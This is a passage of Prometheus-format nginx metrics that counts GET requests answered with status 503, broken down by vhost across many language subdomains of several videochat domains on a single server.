38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.show"} 527 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.tv.br"} 4142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.world"} 2710 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.cafe"} 1563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.date"} 465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.show"} 437 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.tv.br"} 3486 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="km.videochat.world"} 1201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.cafe"} 1798 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.date"} 498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.mx"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.show"} 313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.tv.br"} 3692 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kn.videochat.world"} 1220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.cafe"} 1349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.date"} 867 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.mx"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.show"} 338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.tv.br"} 3605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ko.videochat.world"} 1166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kxylkid.videochat.mx"} 448 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.cafe"} 4083 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.date"} 772 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.show"} 809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.tv.br"} 3723 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ky.videochat.world"} 2109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.cafe"} 872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.date"} 346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.mx"} 5083 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.show"} 341 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.tv.br"} 3480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lb.videochat.world"} 727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.cafe"} 1319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.date"} 465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.show"} 976 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.tv.br"} 3959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lo.videochat.world"} 1050 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.cafe"} 1650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.date"} 887 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.mx"} 2992 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.show"} 353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.tv.br"} 2865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lt.videochat.world"} 632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.cafe"} 2078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.date"} 892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.mx"} 2103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.show"} 470 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.tv.br"} 3256 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="lv.videochat.world"} 836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mail.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.cafe"} 787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.date"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.mx"} 7092 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.show"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.tv.br"} 2809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mg.videochat.world"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.cafe"} 2242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.date"} 435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.mx"} 2877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.show"} 355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.tv.br"} 3454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mi.videochat.world"} 558 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.cafe"} 2851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.date"} 1147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.mx"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.show"} 462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.tv.br"} 3736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mk.videochat.world"} 2254 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.cafe"} 1463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.date"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.mx"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.show"} 382 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.tv.br"} 3552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ml.videochat.world"} 977 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.cafe"} 2890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.date"} 865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.mx"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.show"} 655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.tv.br"} 3550 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mn.videochat.world"} 1582 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.cafe"} 1463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.date"} 518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.show"} 1333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.tv.br"} 3916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mr.videochat.world"} 1199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.cafe"} 3216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.date"} 966 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.show"} 1551 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.tv.br"} 4255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mrj.videochat.world"} 1907 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.cafe"} 991 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.date"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.mx"} 8044 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.show"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.tv.br"} 2801 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ms.videochat.world"} 774 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.cafe"} 1218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.date"} 677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.mx"} 4331 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.show"} 364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.tv.br"} 4113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="mt.videochat.world"} 944 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.cafe"} 1244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.date"} 574 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.show"} 444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.tv.br"} 3751 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="my.videochat.world"} 1237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.cafe"} 1365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.date"} 641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.show"} 1062 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.tv.br"} 3739 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ne.videochat.world"} 1146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.cafe"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.date"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.mx"} 6729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.show"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.tv.br"} 2839 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="nl.videochat.world"} 714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.cafe"} 1290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.date"} 680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.mx"} 5974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.show"} 759 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.tv.br"} 3502 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="no.videochat.world"} 764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.cafe"} 1336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.date"} 688 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.show"} 513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.tv.br"} 3761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pa.videochat.world"} 838 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.cafe"} 996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.date"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.mx"} 2259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.show"} 216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.tv.br"} 2965 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pap.videochat.world"} 442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.cafe"} 1059 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.date"} 811 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.mx"} 4012 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.show"} 284 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.tv.br"} 3180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pl.videochat.world"} 546 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.cafe"} 1135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.date"} 577 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.mx"} 6427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.show"} 295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="pt.videochat.world"} 756 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="rbohjhr.videochat.mx"} 278 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.cafe"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.date"} 859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.mx"} 4746 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.show"} 456 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.tv.br"} 3553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ro.videochat.world"} 547 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.cafe"} 1330 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.date"} 506 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.mx"} 2644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.show"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.tv.br"} 3628 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sco.videochat.world"} 560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.cafe"} 1602 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.date"} 667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.show"} 997 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.tv.br"} 3811 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="si.videochat.world"} 869 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sitemap.xml"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.cafe"} 1333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.date"} 816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.mx"} 3458 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.show"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.tv.br"} 3287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sk.videochat.world"} 852 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.cafe"} 1292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.date"} 445 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.mx"} 5541 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.show"} 510 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.tv.br"} 4036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sl.videochat.world"} 550 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.cafe"} 2567 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.date"} 1389 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.mx"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.show"} 721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.tv.br"} 3317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sr.videochat.world"} 1323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ssh-2.0"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="staging.videochat.mx"} 237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.cafe"} 729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.date"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.mx"} 7830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.show"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.tv.br"} 3287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="su.videochat.world"} 372 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.cafe"} 1329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.date"} 658 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.mx"} 4558 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.show"} 347 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.tv.br"} 3614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sv.videochat.world"} 469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.cafe"} 909 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.date"} 230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.mx"} 8532 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.show"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.tv.br"} 2555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="sw.videochat.world"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.cafe"} 1448 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.date"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.show"} 553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.tv.br"} 3989 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ta.videochat.world"} 880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.cafe"} 1358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.date"} 687 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.mx"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.show"} 457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.tv.br"} 3868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="te.videochat.world"} 1236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="test.videochat.mx"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.cafe"} 3214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.date"} 793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.show"} 387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.tv.br"} 3235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tg.videochat.world"} 1880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.cafe"} 1303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.date"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.show"} 415 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.tv.br"} 3482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="th.videochat.world"} 1030 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.cafe"} 5845 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.date"} 2477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.mx"} 8069 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.show"} 590 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.tv.br"} 2673 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tl.videochat.world"} 6273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.cafe"} 1820 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.date"} 872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.mx"} 1986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.show"} 357 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.tv.br"} 3601 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tr.videochat.world"} 784 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.cafe"} 2432 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.date"} 1129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.mx"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.show"} 1058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.tv.br"} 4261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="tt.videochat.world"} 1082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.cafe"} 3385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.date"} 1134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.show"} 1234 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.tv.br"} 3079 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="udm.videochat.world"} 1667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.cafe"} 4187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.date"} 2401 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.show"} 698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.tv.br"} 3619 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uk.videochat.world"} 2162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.cafe"} 1473 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.date"} 649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.show"} 1359 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.tv.br"} 3704 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ur.videochat.world"} 1050 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.cafe"} 1008 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.date"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.mx"} 6989 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.show"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.tv.br"} 3509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="uz.videochat.world"} 604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.cafe"} 2257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.date"} 791 